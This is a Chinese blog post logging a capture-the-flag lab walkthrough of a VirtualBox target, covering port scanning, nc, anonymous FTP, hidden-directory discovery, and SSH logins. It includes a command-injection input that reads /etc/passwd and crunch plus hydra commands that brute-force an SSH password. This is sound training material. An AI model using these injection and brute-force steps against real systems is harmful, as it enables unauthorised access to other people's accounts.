6.17靶场夺旗记录

该文介绍了使用KaliLinux进行渗透测试的过程,包括VBox导入靶场、nc工具的运用、nmap扫描靶机端口、FTP服务利用、SSH连接及密码破解。通过crunch生成密码字典并利用hydra进行暴力破解,最终成功登陆目标用户。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 准备:

kali攻击

vbox导入靶场

nc工具使用(netcap) - 上行 - 博客园 (cnblogs.com)

(32条消息) netcat(NC)学习笔记-nc命令基础解释以及基础使用--包含使用nc获取shell_铁锤2号的博客-优快云博客 

vm导入靶机失败记录

 

 使用vbox,将文件后缀修改成vbox  新建导入现有磁盘 成功导入

相关渗透思路链接:

(31条消息) CTF夺旗训练课程_靶场夺旗_taozijun的博客-优快云博客

(31条消息) 找不到靶机的IP怎么办,教你几步就会了_靶机ip_泣血花的博客-优快云博客

(31条消息) CTF练习:靶场夺旗_ctf靶场夺旗_CNwanku的博客-优快云博客

(31条消息) 靶场夺旗_^BonnenuIt的博客-优快云博客

CTF挑战130分 Rickdiculously 1.0_网易订阅 (163.com)

渗透步骤:

发现靶场

使用arp-scan扫描发现靶场(vbox导入后带pcs  有这个标识就是靶机)

网上讲解 使用nmap扫描也可以发现靶机(?)

 

发现端口

 使用nmap扫描靶机开放端口

使用nc扫描端口(更全面)

对网址端口进行访问

扫描使用dirb隐藏目录

flag1:

nc 192.168.109.149 13337

nc  靶机地址  端口

表示

flag2:

nc 192.168.1.106 60000

flag3:

在浏览器地址栏输入网址的9090端口

flag4:

由于开放ftp服务

在本机输入ftp:\\192.168.109.149进行ftp匿名访问

flag5:

根据80的隐藏目录扫描结果得到隐藏目录,在地址栏输入隐藏目录地址

 打开第二个password.html没有发现密码,打开页面源代码发现一个密码隐藏在这

 

根据隐藏目录robots.txt文件发现目录下有一个留言板并有sql注入存在

根据提示输入地址

 

 通过尝试发现可以使用

127.0.0.1;more /etc/passwd/

可以查看用户名和密码

flag6: 

根据上面的收集结果得到用户名和密码尝试ssh端口连接 成功登陆Summer用户

flag7:

复制用户下的文件到已经可以登陆的Summer用户下进行查看,用xftp进行连接下载

flag8:

复制RickSanchez用户下的文件到已经可以登陆的Summer用户下进行查看

(32条消息) 密码字典生成工具:crunch_密码字典生成器_会测试的鲸鱼的博客-优快云博客

(32条消息) crunch 使用教程-随心所欲生成字典_crunch生成字典_hyled-Ava的博客-优快云博客

crunch 密码字典生成工具参考文档

crunch 5 5 -t ,%The > rick.txt

crunch 7 7 -t ,%Flesh >> rick.txt

crunch 10 10 -t ,%Curtains >> rick.txt

hydra -l RickSanchez -P rick.txt -t 4 ssh://192.168.1.107:22222

flag9:

通过破出来的密码进行连接用户,成功登陆

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值